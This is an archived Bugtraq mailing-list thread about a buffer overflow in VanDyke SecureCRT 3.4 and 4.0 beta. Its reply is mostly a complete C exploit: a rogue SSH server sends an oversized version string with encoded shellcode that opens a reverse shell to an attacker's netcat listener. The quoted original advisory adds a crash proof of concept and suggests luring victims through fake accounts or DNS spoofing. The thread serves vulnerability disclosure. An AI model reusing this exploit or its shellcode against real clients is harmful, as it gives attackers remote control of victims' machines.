Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta

From: "Andrea Lisci" <andrea.lisci () fst it>
Date: Wed, 24 Jul 2002 15:30:34 +0200
The following code is a remote shell exploiting the bug discovered by
Kyuzo... it use netcat

bye



// The bug was discovered by Kyuzo
// The schell code exploit was coded by Andrea Lisci
// The program working in the following way
//
// run the exploit
//./shellcode <netcat_machine> <netcat_port>
// run the netcat
// nc -l -p <netcat_port>
// connect from secureCRT to the port 9988 using ssh version 1
//
// the remote shell will be opened at netcat computer



#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PORT 9988

int main(int argc, char **argv) {
    int s, n, i, sz = sizeof(struct sockaddr_in);
    struct sockaddr_in local, whatever;
    char payload[2510], *pshell;

    unsigned char preshell[]="\xb8\x00\x03\xff\xe0";


    unsigned short int a_port;
    unsigned long a_host;
    struct hostent *ht;
    struct sockaddr_in sin;

unsigned char shell[] =
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\x16\x53\x84"
"\x6a\x73\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\xc4\x2b\x02\x75\x66\xc7\x47\x4c\x01\x81\x50\x8d\x47\x20"
"\x50\x83\xee\x11\x05\x11\x11\x11\x01\x2d\x7a\x12\x11\x01\xff\xe0";


 a_port=htons(atoi(argv[2]));
 a_port ^= 0x9595;
 //ht=gethostbyname(argv[1]);
 //a_host= (unsigned long) *(ht->h_addr);
 a_host=inet_addr(argv[1]);
 a_host ^= 0x95959595;

 shell[385]= ((a_port) & 0xff);
 shell[386]= ((a_port >> 8 ) & 0xff);
 shell[390]= ((a_host) & 0xff);
 shell[391]= ((a_host >> 8) & 0xff);
 shell[392]= ((a_host >>16) & 0xff);
 shell[393]= ((a_host >>24) & 0xff);

  memset(payload,0x90,sizeof(payload));



    strcpy(payload, "SSH-1.1-");
    for (i = 8; i < 267; i++)
payload[i] = 'A';
    payload[i+1]=0x00;
    payload[i+2]=0xbb;
    payload[i+3]=0x12;
    payload[i+4]=0x00;
    payload[i+5] = '\n';
    payload[i+6]= '\0';

    pshell=&payload;
    pshell+=100;
    memcpy(pshell,preshell,sizeof(preshell));

    pshell=&payload;
    pshell+=300;
    memcpy(pshell,shell,sizeof(shell));


    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
return 1;
    }
    local.sin_family = AF_INET;
    local.sin_port = htons(PORT);
    local.sin_addr.s_addr = INADDR_ANY;
    memset(&(local.sin_zero), 0, 8);
    if (bind(s, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) {
perror("bind");
return 1;
    }
    if (listen(s, 2) == -1)  {
perror("listen");
return 1;
    }
    printf("waiting for connection...\n");
    if ((n = accept(s, (struct sockaddr *)&whatever, &sz)) == -1) {
perror("accept");
return 1;
    }
    printf("client connected\n");
    if (send(n, payload, sizeof(payload) - 1, 0) == -1) {
perror("send");
return 1;
    }
    printf("sent string: [%s]\n", payload);
    close(n);
    close(s);
    return 0;
}

----- Original Message -----
From: "Kyuzo" <ogl () SirDrinkalot rm-f net>
To: <bugtraq () securityfocus com>
Sent: Tuesday, July 23, 2002 5:09 AM
Subject: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 &
4.0 beta



SecureCRT (http://www.vandyke.com/products/securecrt/) seems to have a bug

in a

seemlingly trivial portion of its SSH connection code.  When an SSH Client
connects to a server, the server sends a version string containing minor

and

major numbers for the protocol, as well as a server-specific identifier

string

which is specified to be no more than 40 bytes long.  Unfortunetly the

SecureCRT

code which handles errors relating to an unsupported protocol version

contains

an unchecked buffer overflow when dealing with this identifier string.

The following C code is given to reproduce this bug (yes I know Perl would

have

been shorter, sorry):

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PORT 9988

int main(int argc, char **argv) {
    int s, n, i, sz = sizeof(struct sockaddr_in);
    struct sockaddr_in local, whatever;
    char payload[510];

    strcpy(payload, "SSH-1.1-");
    for (i = 8; i < 508; i++)
payload[i] = 'A';
    payload[508] = '\n';
    payload[509] = '\0';

    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
return 1;
    }
    local.sin_family = AF_INET;
    local.sin_port = htons(PORT);
    local.sin_addr.s_addr = INADDR_ANY;
    memset(&(local.sin_zero), 0, 8);
    if (bind(s, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1)

{

perror("bind");
return 1;
    }
    if (listen(s, 2) == -1)  {
perror("listen");
return 1;
    }
    printf("waiting for connection...\n");
    if ((n = accept(s, (struct sockaddr *)&whatever, &sz)) == -1) {
perror("accept");
return 1;
    }
    printf("client connected\n");
    if (send(n, payload, sizeof(payload) - 1, 0) == -1) {
perror("send");
return 1;
    }
    printf("sent string: [%s]\n", payload);
    close(n);
    close(s);
    return 0;
}

After starting the (fake) server, run the SecureCRT client, attach a

debugger

and connect.  Notice the value of PC is now 0x41414141...coincidence?

There are a number of ways to trick people into connecting to your ssh

server,

i.e. telling them you've given them an account on your shell, dns spoofing

etc.


    Big shout-out to Lagow, Biggie Smalls (up in heaven),
    Gweeds, & the whole Mr. Mittens crew

- Kyuzo
Previous By Date Next
Previous By Thread Next

Current thread: